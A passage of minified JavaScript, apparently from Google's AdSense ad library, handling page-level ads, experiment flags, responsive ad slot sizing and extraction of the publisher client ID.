wl(a){U(L).allow_second_reactive_tag=a} function xl(){var a=U(window);a.afg_slotcar_vars||(a.afg_slotcar_vars={});return a.afg_slotcar_vars};function yl(a,b){if(!a)return!1;a=a.hash;if(!a||!a.indexOf)return!1;if(-1!=a.indexOf(b))return!0;b=zl(b);return"go"!=b&&-1!=a.indexOf(b)?!0:!1}function zl(a){var b="";Sc(a.split("_"),function(c){b+=c.substr(0,2)});return b};$a||!x("Safari")||Oa();function Al(){var a=this;this.promise=new p.Promise(function(b,c){a.resolve=b;a.reject=c})};function Bl(){var a=new Al;return{promise:a.promise,resolve:a.resolve}};function Cl(a){a=void 0===a?function(){}:a;w.google_llp||(w.google_llp={});var b=w.google_llp,c=b[7];if(c)return c;c=Bl();b[7]=c;a();return c}function Dl(a){return Cl(function(){Lc(w.document,a)}).promise};function El(a){var b={};return{enable_page_level_ads:(b.pltais=!0,b),google_ad_client:a}};function Fl(a){if(w.google_apltlad||w!==w.top||!a.google_ad_client)return null;w.google_apltlad=!0;var b=El(a.google_ad_client),c=b.enable_page_level_ads;Sc(a,function(d,e){Ei[e]&&"google_ad_client"!==e&&(c[e]=d)});c.google_pgb_reactive=7;if("google_ad_section"in a||"google_ad_region"in a)c.google_ad_section=a.google_ad_section||a.google_ad_region;return b}function Gl(a){return ya(a.enable_page_level_ads)&&7===a.enable_page_level_ads.google_pgb_reactive};function Hl(a,b){this.h=w;this.i=a;this.j=b}function Il(a){P(lf)?il(a.h,a.j,a.i.google_ad_client||"",function(b){var c=a.h,d=a.i;U(L).ama_ran_on_page||b&&Jl(c,d,b)}):Tj({u:a.h,Z:D(a.j,6),ta:50,Ia:function(b){return Kl(a,b)}})}function Kl(a,b){Ed(Cd(b,function(c){Ll("ok");var d=a.h,e=a.i;if(!U(L).ama_ran_on_page){var f=Dk(c);f?Jl(d,e,f):Ek(d,c)}}),function(c){return Ll(c.message)})}function Ll(a){Yi("abg::amalserr",{status:a,guarding:!0,timeout:50,rate:.01},.01)} function Jl(a,b,c){if(null!=A(c,24)){var d=Si(a);d.availableAbg=!0;var e,f;d.ablationFromStorage=!!(null==(e=G(c,ee,24))?0:null==(f=G(e,ge,3))?0:Ib(f,he,2,ie))}if(Gl(b)&&(d=wk(a,H(c,me,7)),!d||!xb(d,8)))return;U(L).ama_ran_on_page=!0;var g;if(null==(g=G(c,re,15))?0:xb(g,23))U(a).enable_overlap_observer=!0;if((g=G(c,pe,13))&&1===A(g,1)){var h=0,k=G(g,qe,6);k&&A(k,3)&&(h=A(k,3)||0);vl(a,h)}else if(null==(h=G(c,ee,24))?0:null==(k=G(h,ge,3))?0:Ib(k,he,2,ie))Si(a).ablatingThisPageview=!0,vl(a,1);kd(3, [c.toJSON()]);var l=b.google_ad_client||"";b=Bk(ya(b.enable_page_level_ads)?b.enable_page_level_ads:{});var m=Rd(Vd,new Qd(null,b));Wi(782,function(){var q=m;try{var t=wk(a,H(c,me,7)),y;if(y=t)a:{var F=wb(t,2);if(F)for(var z=0;z<F.length;z++)if(1==F[z]){y=!0;break a}y=!1}if(y){if(A(t,4)){y={};var E=new Qd(null,(y.google_package=A(t,4),y));q=Rd(q,E)}var S=new vj(a,l,c,t,q),rb=new sd;(new fk(a,S,rb)).start();rb.i.then(Fa(sl,a),Fa(tl,a))}}catch(Kc){Ak(a,{atf:-1})}})};/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var Ml=ja(["https://fonts.googleapis.com/css2?family=Google+Material+Icons:wght@400;500;700"]);function Nl(a,b){return a instanceof HTMLScriptElement&&b.test(a.src)?0:1}function Ol(a){var b=L.document;if(b.currentScript)return Nl(b.currentScript,a);b=u(b.scripts);for(var c=b.next();!c.done;c=b.next())if(0===Nl(c.value,a))return 0;return 1};function Pl(a,b){var c={},d={},e={},f={};return f[fg]=(c[55]=function(){return 0===a},c[23]=function(g){return Yk(L,Number(g))},c[24]=function(g){return bl(Number(g))},c[61]=function(){return D(b,6)},c[63]=function(){return D(b,6)||".google.ch"===I(b,8)},c),f[gg]=(d[7]=function(g){try{var h=window.localStorage}catch(l){h=null}g=Number(g);g=void 0===g?0:g;g=0!==g?"google_experiment_mod"+g:"google_experiment_mod";var k=Vc(h,g);h=null===k?Wc(h,g):k;return null!=h?h:void 0},d),f[hg]=(e[6]=function(){return I(b, 15)},e),f};function Ql(a){a=void 0===a?w:a;return a.ggeac||(a.ggeac={})};function Rl(a,b){try{var c=a.split(".");a=w;for(var d=0,e;null!=a&&d<c.length;d++)e=a,a=a[c[d]],"function"===typeof a&&(a=e[c[d]]());var f=a;if(typeof f===b)return f}catch(g){}} function Sl(){var a={};this[fg]=(a[8]=function(b){try{return null!=va(b)}catch(c){}},a[9]=function(b){try{var c=va(b)}catch(d){return}if(b="function"===typeof c)c=c&&c.toString&&c.toString(),b="string"===typeof c&&-1!=c.indexOf("[native code]");return b},a[10]=function(){return window==window.top},a[6]=function(b){return Xa(O(Oh).h(),parseInt(b,10))},a[27]=function(b){b=Rl(b,"boolean");return void 0!==b?b:void 0},a[60]=function(b){try{return!!w.document.querySelector(b)}catch(c){}},a);a={};this[gg]= (a[3]=function(){return ad()},a[6]=function(b){b=Rl(b,"number");return void 0!==b?b:void 0},a[11]=function(b){b=void 0===b?"":b;var c=w;b=void 0===b?"":b;c=void 0===c?window:c;b=(c=(c=c.location.href.match(Ec)[3]||null)?decodeURI(c):c)?Tc(c+b):null;return null==b?void 0:b%1E3},a);a={};this[hg]=(a[2]=function(){return window.location.href},a[3]=function(){try{return window.top.location.hash}catch(b){return""}},a[4]=function(b){b=Rl(b,"string");return void 0!==b?b:void 0},a[10]=function(){try{var b= w.document;return b.visibilityState||b.webkitVisibilityState||b.mozVisibilityState||""}catch(c){return""}},a[11]=function(){try{var b,c,d,e,f;return null!=(f=null==(d=null==(b=va("google_tag_data"))?void 0:null==(c=b.uach)?void 0:c.fullVersionList)?void 0:null==(e=r(d,"find").call(d,function(g){return"Google Chrome"===g.brand}))?void 0:e.version)?f:""}catch(g){return""}},a)};var Tl=[12,13,20];function Ul(){}Ul.prototype.init=function(a,b,c,d){var e=this;d=void 0===d?{}:d;var f=void 0===d.Ka?!1:d.Ka,g=void 0===d.kb?{}:d.kb;d=void 0===d.mb?[]:d.mb;this.l=a;this.A={};this.G=f;this.m=g;a={};this.i=(a[b]=[],a[4]=[],a);this.j={};(b=Wh())&&Ra(b.split(",")||[],function(h){(h=parseInt(h,10))&&(e.j[h]=!0)});Ra(d,function(h){e.j[h]=!0});this.h=c;return this}; function Vl(a,b,c){var d=[],e=Wl(a.l,b),f;if(f=9!==b)a.A[b]?f=!0:(a.A[b]=!0,f=!1);if(f){var g;null==(g=a.h)||Yg(g,b,c,d,[],4);return d}if(!e.length){var h;null==(h=a.h)||Yg(h,b,c,d,[],3);return d}var k=Xa(Tl,b),l=[];Ra(e,function(q){var t=new Jg;if(q=Xl(a,q,c,t))0!==Cb(t,Kg)&&l.push(t),t=q.getId(),d.push(t),Yl(a,t,k?4:c),(q=H(q,qg,2))&&(k?oh(q,qh(),a.h,t):oh(q,[c],a.h,t))});var m;null==(m=a.h)||Yg(m,b,c,d,l,1);return d}function Yl(a,b,c){a.i[c]||(a.i[c]=[]);a=a.i[c];Xa(a,b)||a.push(b)} function Zl(a,b){a.l.push.apply(a.l,ka(Sa(Ta(b,function(c){return new Ok(c)}),function(c){return!Xa(Tl,c.V())})))} function Xl(a,b,c,d){var e=O(ah).h;if(!mg(G(b,ag,3),e))return null;var f=H(b,Ik,2),g=C(b,6,0);if(g){Bb(d,1,Kg,g);f=e[gg];switch(c){case 2:var h=f[8];break;case 1:h=f[7]}c=void 0;if(h)try{c=h(g),Ab(d,3,c)}catch(k){}return(b=$l(b,c))?am(a,[b],1):null}if(g=C(b,10,0)){Bb(d,2,Kg,g);h=null;switch(c){case 1:h=e[gg][9];break;case 2:h=e[gg][10];break;default:return null}c=h?h(String(g)):void 0;if(void 0===c&&1===C(b,11,0))return null;void 0!==c&&Ab(d,3,c);return(b=$l(b,c))?am(a,[b],1):null}d=e?Sa(f,function(k){return mg(G(k, ag,3),e)}):f;if(!d.length)return null;c=d.length*C(b,1,0);return(b=C(b,4,0))?bm(a,b,c,d):am(a,d,c/1E3)}function bm(a,b,c,d){var e=null!=a.m[b]?a.m[b]:1E3;if(0>=e)return null;d=am(a,d,c/e);a.m[b]=d?0:e-c;return d}function am(a,b,c){var d=a.j,e=Va(b,function(f){return!!d[f.getId()]});return e?e:a.G?null:Oc(b,c)} function cm(a,b){Jh(th,function(c){a.j[c]=!0},b);Jh(wh,function(c,d){return Vl(a,c,d)},b);Jh(xh,function(c){return(a.i[c]||[]).concat(a.i[4])},b);Jh(Gh,function(c){return Zl(a,c)},b);Jh(uh,function(c,d){return Yl(a,c,d)},b)}function Wl(a,b){return(a=Va(a,function(c){return c.V()==b}))&&H(a,Kk,2)||[]}function $l(a,b){var c=H(a,Ik,2),d=c.length,e=C(a,8,0);a=d*C(a,1,0)-1;b=void 0!==b?b:Math.floor(1E3*Rc());d=(b-e)%d;if(b<e||b-e-d>=a)return null;c=c[d];e=O(ah).h;return!c||e&&!mg(G(c,ag,3),e)?null:c};function dm(){this.h=function(){}}function em(a){O(dm).h(a)};var fm,gm,hm,im,jm,km; function lm(a,b,c,d){var e=1;d=void 0===d?Ql():d;e=void 0===e?0:e;var f=void 0===f?new Tg(null!=(im=null==(fm=G(a,Qk,5))?void 0:C(fm,2,0))?im:0,null!=(jm=null==(gm=G(a,Qk,5))?void 0:C(gm,4,0))?jm:0,null!=(km=null==(hm=G(a,Qk,5))?void 0:D(hm,3))?km:!1):f;d.hasOwnProperty("init-done")?(Kh(Gh,d)(Ta(H(a,Ok,2),function(g){return g.toJSON()})),Kh(Hh,d)(Ta(H(a,qg,1),function(g){return g.toJSON()}),e),b&&Kh(Ih,d)(b),mm(d,e)):(cm(O(Ul).init(H(a,Ok,2),e,f,c),d),Lh(d),Mh(d),Nh(d),mm(d,e),oh(H(a,qg,1),[e],f, void 0,!0),bh=bh||!(!c||!c.hb),em(O(Sl)),b&&em(b))}function mm(a,b){a=void 0===a?Ql():a;b=void 0===b?0:b;var c=a,d=b;d=void 0===d?0:d;Ph(O(Oh),c,d);nm(a,b);O(dm).h=Kh(Ih,a);O(yf).m()}function nm(a,b){var c=O(yf);c.i=function(d,e){return Kh(zh,a,function(){return!1})(d,e,b)};c.j=function(d,e){return Kh(Ah,a,function(){return 0})(d,e,b)};c.l=function(d,e){return Kh(Bh,a,function(){return""})(d,e,b)};c.h=function(d,e){return Kh(Ch,a,function(){return[]})(d,e,b)};c.m=function(){Kh(vh,a)(b)}};function om(a,b,c){var d=U(a);if(d.plle)mm(Ql(a),1);else{d.plle=!0;try{var e=a.localStorage}catch(f){e=null}d=e;null==Vc(d,"goog_pem_mod")&&Wc(d,"goog_pem_mod");d=G(b,Mk,12);e=D(b,9);lm(d,Pl(c,b),{Ka:e&&!!a.google_disable_experiments,hb:e},Ql(a));if(c=I(b,15))c=Number(c),O(Oh).l(c);if(c=I(b,10))c=Number(c),O(Oh).i(c);b=u(wb(b,19));for(c=b.next();!c.done;c=b.next())c=c.value,O(Oh).i(c);O(Oh).j(12);O(Oh).j(10);a=Ic(a)||a;yl(a.location,"google_mc_lab")&&O(Oh).i(44738307)}};function pm(a,b,c){a=a.style;a.border="none";a.height=c+"px";a.width=b+"px";a.margin=0;a.padding=0;a.position="relative";a.visibility="visible";a.backgroundColor="transparent"};var qm={"120x90":!0,"160x90":!0,"180x90":!0,"200x90":!0,"468x15":!0,"728x15":!0};function rm(a,b){if(15==b){if(728<=a)return 728;if(468<=a)return 468}else if(90==b){if(200<=a)return 200;if(180<=a)return 180;if(160<=a)return 160;if(120<=a)return 120}return null};function V(a,b,c,d){d=void 0===d?!1:d;wi.call(this,a,b);this.da=c;this.ib=d}v(V,wi);V.prototype.pa=function(){return this.da};V.prototype.i=function(a,b,c){b.google_ad_resize||(c.style.height=this.height()+"px",b.rpe=!0)};function sm(a){return function(b){return!!(b.da&a)}};var tm={},um=(tm.image_stacked=1/1.91,tm.image_sidebyside=1/3.82,tm.mobile_banner_image_sidebyside=1/3.82,tm.pub_control_image_stacked=1/1.91,tm.pub_control_image_sidebyside=1/3.82,tm.pub_control_image_card_stacked=1/1.91,tm.pub_control_image_card_sidebyside=1/3.74,tm.pub_control_text=0,tm.pub_control_text_card=0,tm),vm={},wm=(vm.image_stacked=80,vm.image_sidebyside=0,vm.mobile_banner_image_sidebyside=0,vm.pub_control_image_stacked=80,vm.pub_control_image_sidebyside=0,vm.pub_control_image_card_stacked= 85,vm.pub_control_image_card_sidebyside=0,vm.pub_control_text=80,vm.pub_control_text_card=80,vm),xm={},ym=(xm.pub_control_image_stacked=100,xm.pub_control_image_sidebyside=200,xm.pub_control_image_card_stacked=150,xm.pub_control_image_card_sidebyside=250,xm.pub_control_text=100,xm.pub_control_text_card=150,xm); function zm(a){var b=0;a.T&&b++;a.J&&b++;a.K&&b++;if(3>b)return{M:"Tags data-matched-content-ui-type, data-matched-content-columns-num and data-matched-content-rows-num should be set together."};b=a.T.split(",");var c=a.K.split(",");a=a.J.split(",");if(b.length!==c.length||b.length!==a.length)return{M:'Lengths of parameters data-matched-content-ui-type, data-matched-content-columns-num and data-matched-content-rows-num must match. Example: \n data-matched-content-rows-num="4,2"\ndata-matched-content-columns-num="1,6"\ndata-matched-content-ui-type="image_stacked,image_card_sidebyside"'}; if(2<b.length)return{M:"The parameter length of attribute data-matched-content-ui-type, data-matched-content-columns-num and data-matched-content-rows-num is too long. At most 2 parameters for each attribute are needed: one for mobile and one for desktop, while you are providing "+(b.length+' parameters. Example: \n data-matched-content-rows-num="4,2"\ndata-matched-content-columns-num="1,6"\ndata-matched-content-ui-type="image_stacked,image_card_sidebyside".')};for(var d=[],e=[],f=0;f<b.length;f++){var g= Number(c[f]);if(r(Number,"isNaN").call(Number,g)||0===g)return{M:"Wrong value '"+c[f]+"' for data-matched-content-rows-num."};d.push(g);g=Number(a[f]);if(r(Number,"isNaN").call(Number,g)||0===g)return{M:"Wrong value '"+a[f]+"' for data-matched-content-columns-num."};e.push(g)}return{K:d,J:e,Na:b}} function Am(a){return 1200<=a?{width:1200,height:600}:850<=a?{width:a,height:Math.floor(.5*a)}:550<=a?{width:a,height:Math.floor(.6*a)}:468<=a?{width:a,height:Math.floor(.7*a)}:{width:a,height:Math.floor(3.44*a)}};var Bm=Za("script");function Cm(a,b,c,d,e,f,g,h,k,l,m,q){this.A=a;this.U=b;this.da=void 0===c?null:c;this.h=void 0===d?null:d;this.P=void 0===e?null:e;this.i=void 0===f?null:f;this.j=void 0===g?null:g;this.H=void 0===h?null:h;this.N=void 0===k?null:k;this.l=void 0===l?null:l;this.m=void 0===m?null:m;this.O=void 0===q?null:q;this.R=this.C=this.G=null}Cm.prototype.size=function(){return this.U}; function Dm(a,b,c){null!=a.da&&(c.google_responsive_formats=a.da);null!=a.P&&(c.google_safe_for_responsive_override=a.P);null!=a.i&&(!0===a.i?c.google_full_width_responsive_allowed=!0:(c.google_full_width_responsive_allowed=!1,c.gfwrnwer=a.i));null!=a.j&&!0!==a.j&&(c.gfwrnher=a.j);var d=a.m||c.google_ad_width;null!=d&&(c.google_resizing_width=d);d=a.l||c.google_ad_height;null!=d&&(c.google_resizing_height=d);d=a.size().h(b);var e=a.size().height();if(!c.google_ad_resize){c.google_ad_width=d;c.google_ad_height= e;var f=a.size();b=f.h(b)+"x"+f.height();c.google_ad_format=b;c.google_responsive_auto_format=a.A;null!=a.h&&(c.armr=a.h);c.google_ad_resizable=!0;c.google_override_format=1;c.google_loader_features_used=128;!0===a.i&&(c.gfwrnh=a.size().height()+"px")}null!=a.H&&(c.gfwroml=a.H);null!=a.N&&(c.gfwromr=a.N);null!=a.l&&(c.gfwroh=a.l);null!=a.m&&(c.gfwrow=a.m);null!=a.O&&(c.gfwroz=a.O);null!=a.G&&(c.gml=a.G);null!=a.C&&(c.gmr=a.C);null!=a.R&&(c.gzi=a.R);b=Ic(window)||window;yl(b.location,"google_responsive_dummy_ad")&& (Xa([1,2,3,4,5,6,7,8],a.A)||1===a.h)&&2!==a.h&&(a=JSON.stringify({googMsgType:"adpnt",key_value:[{key:"qid",value:"DUMMY_AD"}]}),c.dash="<"+Bm+">window.top.postMessage('"+a+"', '*');\n </"+Bm+'>\n <div id="dummyAd" style="width:'+d+"px;height:"+e+'px;\n background:#ddd;border:3px solid #f00;box-sizing:border-box;\n color:#000;">\n <p>Requested size:'+d+"x"+e+"</p>\n <p>Rendered size:"+d+"x"+e+"</p>\n </div>")};var Em=["google_content_recommendation_ui_type","google_content_recommendation_columns_num","google_content_recommendation_rows_num"];function Fm(a,b){wi.call(this,a,b)}v(Fm,wi);Fm.prototype.h=function(a){return Math.min(1200,Math.max(this.minWidth(),Math.round(a)))}; function Gm(a,b){Hm(a,b);if("pedestal"==b.google_content_recommendation_ui_type)return new Cm(9,new Fm(a,Math.floor(a*b.google_phwr)));var c=Cc();468>a?c?(c=a-8-8,c=Math.floor(c/1.91+70)+Math.floor(11*(c*um.mobile_banner_image_sidebyside+wm.mobile_banner_image_sidebyside)+96),a={aa:a,$:c,J:1,K:12,T:"mobile_banner_image_sidebyside"}):(a=Am(a),a={aa:a.width,$:a.height,J:1,K:13,T:"image_sidebyside"}):(a=Am(a),a={aa:a.width,$:a.height,J:4,K:2,T:"image_stacked"});Im(b,a);return new Cm(9,new Fm(a.aa,a.$))} function Jm(a,b){Hm(a,b);var c=zm({K:b.google_content_recommendation_rows_num,J:b.google_content_recommendation_columns_num,T:b.google_content_recommendation_ui_type});if(c.M)a={aa:0,$:0,J:0,K:0,T:"image_stacked",M:c.M};else{var d=2===c.Na.length&&468<=a?1:0;var e=c.Na[d];e=0===e.indexOf("pub_control_")?e:"pub_control_"+e;var f=ym[e];for(var g=c.J[d];a/g<f&&1<g;)g--;f=g;c=c.K[d];d=Math.floor(((a-8*f-8)/f*um[e]+wm[e])*c+8*c+8);a=1500<a?{width:0,height:0,rb:"Calculated slot width is too large: "+a}: 1500<d?{width:0,height:0,rb:"Calculated slot height is too large: "+d}:{width:a,height:d};a={aa:a.width,$:a.height,J:f,K:c,T:e}}if(a.M)throw new T(a.M);Im(b,a);return new Cm(9,new Fm(a.aa,a.$))}function Hm(a,b){if(0>=a)throw new T("Invalid responsive width from Matched Content slot "+b.google_ad_slot+": "+a+". Please ensure to put this Matched Content slot into a non-zero width div container.");} function Im(a,b){a.google_content_recommendation_ui_type=b.T;a.google_content_recommendation_columns_num=b.J;a.google_content_recommendation_rows_num=b.K};function Km(a,b){wi.call(this,a,b)}v(Km,wi);Km.prototype.h=function(){return this.minWidth()};Km.prototype.i=function(a,b,c){vi(a,c);b.google_ad_resize||(c.style.height=this.height()+"px",b.rpe=!0)};var Lm={"image-top":function(a){return 600>=a?284+.414*(a-250):429},"image-middle":function(a){return 500>=a?196-.13*(a-250):164+.2*(a-500)},"image-side":function(a){return 500>=a?205-.28*(a-250):134+.21*(a-500)},"text-only":function(a){return 500>=a?187-.228*(a-250):130},"in-article":function(a){return 420>=a?a/1.2:460>=a?a/1.91+130:800>=a?a/4:200}};function Mm(a,b){wi.call(this,a,b)}v(Mm,wi);Mm.prototype.h=function(){return Math.min(1200,this.minWidth())}; function Nm(a,b,c,d,e){var f=e.google_ad_layout||"image-top";if("in-article"==f){var g=a;if("false"==e.google_full_width_responsive)a=g;else if(a=qi(b,c,g,.2,e),!0!==a)e.gfwrnwer=a,a=g;else if(a=Wf(b))if(e.google_full_width_responsive_allowed=!0,c.parentElement){b:{g=c;for(var h=0;100>h&&g.parentElement;++h){for(var k=g.parentElement.childNodes,l=0;l<k.length;++l){var m=k[l];if(m!=g&&ti(b,m))break b}g=g.parentElement;g.style.width="100%";g.style.height="auto"}}vi(b,c)}else a=g;else a=g}if(250>a)throw new T("Fluid responsive ads must be at least 250px wide: availableWidth="+ a);a=Math.min(1200,Math.floor(a));if(d&&"in-article"!=f){f=Math.ceil(d);if(50>f)throw new T("Fluid responsive ads must be at least 50px tall: height="+f);return new Cm(11,new wi(a,f))}if("in-article"!=f&&(d=e.google_ad_layout_key)){f=""+d;b=Math.pow(10,3);if(d=(c=f.match(/([+-][0-9a-z]+)/g))&&c.length){e=[];for(g=0;g<d;g++)e.push(parseInt(c[g],36)/b);b=e}else b=null;if(!b)throw new T("Invalid data-ad-layout-key value: "+f);f=(a+-725)/1E3;c=0;d=1;e=b.length;for(g=0;g<e;g++)c+=b[g]*d,d*=f;f=Math.ceil(1E3* c- -725+10);if(isNaN(f))throw new T("Invalid height: height="+f);if(50>f)throw new T("Fluid responsive ads must be at least 50px tall: height="+f);if(1200<f)throw new T("Fluid responsive ads must be at most 1200px tall: height="+f);return new Cm(11,new wi(a,f))}d=Lm[f];if(!d)throw new T("Invalid data-ad-layout value: "+f);c=Ai(c,b);b=Wf(b);b="in-article"!==f||c||a!==b?Math.ceil(d(a)):Math.ceil(1.25*d(a));return new Cm(11,"in-article"==f?new Mm(a,b):new wi(a,b))};function Om(a){return function(b){for(var c=a.length-1;0<=c;--c)if(!a[c](b))return!1;return!0}}function Pm(a,b){for(var c=Qm.slice(0),d=c.length,e=null,f=0;f<d;++f){var g=c[f];if(a(g)){if(!b||b(g))return g;null===e&&(e=g)}}return e};var W=[new V(970,90,2),new V(728,90,2),new V(468,60,2),new V(336,280,1),new V(320,100,2),new V(320,50,2),new V(300,600,4),new V(300,250,1),new V(250,250,1),new V(234,60,2),new V(200,200,1),new V(180,150,1),new V(160,600,4),new V(125,125,1),new V(120,600,4),new V(120,240,4),new V(120,120,1,!0)],Qm=[W[6],W[12],W[3],W[0],W[7],W[14],W[1],W[8],W[10],W[4],W[15],W[2],W[11],W[5],W[13],W[9],W[16]];function Rm(a,b,c,d,e){"false"==e.google_full_width_responsive?c={D:a,F:1}:"autorelaxed"==b&&e.google_full_width_responsive||Sm(b)||e.google_ad_resize?(b=ri(a,c,d,e),c=!0!==b?{D:a,F:b}:{D:Wf(c)||a,F:!0}):c={D:a,F:2};b=c.F;return!0!==b?{D:a,F:b}:d.parentElement?{D:c.D,F:b}:{D:a,F:b}} function Tm(a,b,c,d,e){var f=Wi(247,function(){return Rm(a,b,c,d,e)}),g=f.D;f=f.F;var h=!0===f,k=K(d.style.width),l=K(d.style.height),m=Um(g,b,c,d,e,h);g=m.Y;h=m.W;var q=m.pa;m=m.Ma;var t=Vm(b,q),y,F=(y=xi(d,c,"marginLeft",K))?y+"px":"",z=(y=xi(d,c,"marginRight",K))?y+"px":"";y=xi(d,c,"zIndex")||"";return new Cm(t,g,q,null,m,f,h,F,z,l,k,y)}function Sm(a){return"auto"==a||/^((^|,) *(horizontal|vertical|rectangle) *)+$/.test(a)} function Um(a,b,c,d,e,f){b="auto"==b?.25>=a/Math.min(1200,Wf(c))?4:3:pi(b);var g=!1,h=!1;if(488>Wf(c)){var k=ki(d,c);var l=Ai(d,c);g=!l&&k;h=l&&k}l=[yi(a),sm(b)];l.push(zi(488>Wf(c),c,d,h));null!=e.google_max_responsive_height&&l.push(Ci(e.google_max_responsive_height));var m=[function(t){return!t.ib}];if(g||h)g=Di(c,d),m.push(Ci(g));var q=Pm(Om(l),Om(m));if(!q)throw new T("No slot size for availableWidth="+a);l=Wi(248,function(){var t;a:if(f){if(e.gfwrnh&&(t=K(e.gfwrnh))){t={Y:new Km(a,t),W:!0}; break a}t=a/1.2;var y=Math;var F=y.min;if(e.google_resizing_allowed||"true"==e.google_full_width_responsive)var z=Infinity;else{z=d;var E=Infinity;do{var S=xi(z,c,"height",K);S&&(E=Math.min(E,S));(S=xi(z,c,"maxHeight",K))&&(E=Math.min(E,S))}while((z=z.parentElement)&&"HTML"!=z.tagName);z=E}y=F.call(y,t,z);if(y<.5*t||100>y)y=t;P(hf)&&!Ai(d,c)&&(y=Math.max(y,.5*Vf(c).clientHeight));t={Y:new Km(a,Math.floor(y)),W:y<t?102:!0}}else t={Y:q,W:100};return t});g=l.Y;l=l.W;return"in-article"===e.google_ad_layout&& Wm(c)?{Y:Xm(a,c,d,g,e),W:!1,pa:b,Ma:k}:{Y:g,W:l,pa:b,Ma:k}}function Vm(a,b){if("auto"==a)return 1;switch(b){case 2:return 2;case 1:return 3;case 4:return 4;case 3:return 5;case 6:return 6;case 5:return 7;case 7:return 8}throw Error("bad mask");}function Xm(a,b,c,d,e){var f=e.google_ad_height||xi(c,b,"height",K);b=Nm(a,b,c,f,e).size();return b.minWidth()*b.height()>a*d.height()?new V(b.minWidth(),b.height(),1):d}function Wm(a){return P(ff)||a.location&&"#hffwroe2etoq"==a.location.hash};function Ym(a,b,c,d,e){var f;(f=Wf(b))?488>Wf(b)?b.innerHeight>=b.innerWidth?(e.google_full_width_responsive_allowed=!0,vi(b,c),f={D:f,F:!0}):f={D:a,F:5}:f={D:a,F:4}:f={D:a,F:10};var g=f;f=g.D;g=g.F;if(!0!==g||a==f)return new Cm(12,new wi(a,d),null,null,!0,g,100);a=Um(f,"auto",b,c,e,!0);return new Cm(1,a.Y,a.pa,2,!0,g,a.W)};function Zm(a,b){var c=b.google_ad_format;if("autorelaxed"==c){a:{if("pedestal"!=b.google_content_recommendation_ui_type)for(a=u(Em),c=a.next();!c.done;c=a.next())if(null!=b[c.value]){b=!0;break a}b=!1}return b?9:5}if(Sm(c))return 1;if("link"===c)return 4;if("fluid"==c){if(c="in-article"===b.google_ad_layout)c=P(gf)||P(ff)||a.location&&("#hffwroe2etop"==a.location.hash||"#hffwroe2etoq"==a.location.hash);return c?($m(b),1):8}if(27===b.google_reactive_ad_format)return $m(b),1} function an(a,b,c,d,e){e=b.offsetWidth||(c.google_ad_resize||(void 0===e?!1:e))&&xi(b,d,"width",K)||c.google_ad_width||0;4===a&&(c.google_ad_format="auto",a=1);var f=(f=bn(a,e,b,c,d))?f:Tm(e,c.google_ad_format,d,b,c);f.size().i(d,c,b);Dm(f,e,c);1!=a&&(a=f.size().height(),b.style.height=a+"px")} function bn(a,b,c,d,e){var f=d.google_ad_height||xi(c,e,"height",K);switch(a){case 5:return f=Wi(247,function(){return Rm(b,d.google_ad_format,e,c,d)}),a=f.D,f=f.F,!0===f&&b!=a&&vi(e,c),!0===f?d.google_full_width_responsive_allowed=!0:(d.google_full_width_responsive_allowed=!1,d.gfwrnwer=f),Gm(a,d);case 9:return Jm(b,d);case 8:return Nm(b,e,c,f,d);case 10:return Ym(b,e,c,f,d)}}function $m(a){a.google_ad_format="auto";a.armr=3};function cn(a,b){var c=Ic(b);if(c){c=Wf(c);var d=Nc(a,b)||{},e=d.direction;if("0px"===d.width&&"none"!==d.cssFloat)return-1;if("ltr"===e&&c)return Math.floor(Math.min(1200,c-a.getBoundingClientRect().left));if("rtl"===e&&c)return a=b.document.body.getBoundingClientRect().right-a.getBoundingClientRect().right,Math.floor(Math.min(1200,c-a-Math.floor((c-b.document.body.clientWidth)/2)))}return-1};var dn=ja(["https://pagead2.googlesyndication.com/pagead/managed/js/adsense/","/slotcar_library",".js"]),en=ja(["https://googleads.g.doubleclick.net/pagead/html/","/","/zrt_lookup.html"]),fn=ja(["https://pagead2.googlesyndication.com/pagead/managed/js/adsense/","/show_ads_impl",".js"]),gn=ja(["https://pagead2.googlesyndication.com/pagead/managed/js/adsense/","/show_ads_impl_with_ama",".js"]),hn=ja(["https://pagead2.googlesyndication.com/pagead/managed/js/adsense/","/show_ads_impl_instrumented",".js"]);function jn(a){Ui.Ta(function(b){b.shv=String(a);b.mjsv="m202204040101";var c=O(Oh).h(),d=U(w);d.eids||(d.eids=[]);b.eid=c.concat(d.eids).join(",")})};function kn(a){var b=a.nb;return a.eb||("dev"===b?"dev":"")};var ln={},mn=(ln.google_ad_modifications=!0,ln.google_analytics_domain_name=!0,ln.google_analytics_uacct=!0,ln.google_pause_ad_requests=!0,ln.google_user_agent_client_hint=!0,ln);function nn(a){return(a=a.innerText||a.innerHTML)&&(a=a.replace(/^\s+/,"").split(/\r?\n/,1)[0].match(/^\x3c!--+(.*?)(?:--+>)?\s*$/))&&RegExp("google_ad_client").test(a[1])?a[1]:null} function on(a){if(a=a.innerText||a.innerHTML)if(a=a.replace(/^\s+|\s+$/g,"").replace(/\s*(\r?\n)+\s*/g,";"),(a=a.match(/^\x3c!--+(.*?)(?:--+>)?$/)||a.match(/^\/*\s*<!\[CDATA\[(.*?)(?:\/*\s*\]\]>)?$/i))&&RegExp("google_ad_client").test(a[1]))return a[1];return null} function pn(a){switch(a){case "true":return!0;case "false":return!1;case "null":return null;case "undefined":break;default:try{var b=a.match(/^(?:'(.*)'|"(.*)")$/);if(b)return b[1]||b[2]||"";if(/^[-+]?\d*(\.\d+)?$/.test(a)){var c=parseFloat(a);return c===c?c:void 0}}catch(d){}}};function qn(a){if(a.google_ad_client)return String(a.google_ad_client);var b,c,d,e,f;if(null!=(e=null!=(d=null==(b=U(a).head_tag_slot_vars)?void 0:b.google_ad_client)?d:null==(c=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:c.getAttribute("data-ad-client")))b=e;else{b:{b=a.document.getElementsByTagName("script");a=a.navigator&&a.navigator.userAgent||"";a=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube", "i").test(a)||/i(phone|pad|pod)/i.test(a)&&/applewebkit/i.test(a)&&!/version|safari/i.test(a)&&!qd()?nn:on;for(c=b.length-1;0<=c;c--)if(d=b[c],!d.google_parsed_script_for_pub_code&&(d.google_parsed_script_for_pub_code=!0,d=a(d))){b=d;break b}b=null}if(b){a=/(google_\w+) *= *(['"]?[\w.-]+['"]?) 